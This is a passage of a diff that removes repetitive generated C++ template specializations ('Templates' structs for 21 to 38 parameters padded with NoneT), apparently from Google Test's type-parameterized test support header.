-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates21<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT> {
-  typedef Templates22<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT> {
-  typedef Templates23<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT> {
-  typedef Templates24<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT> {
-  typedef Templates25<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT> {
-  typedef Templates26<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT> {
-  typedef Templates27<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT> {
-  typedef Templates28<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT> {
-  typedef Templates29<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates30<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates31<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates32<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates33<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates34<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates35<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates36<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates37<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, T37, T38, NoneT, NoneT, NoneT, NoneT,
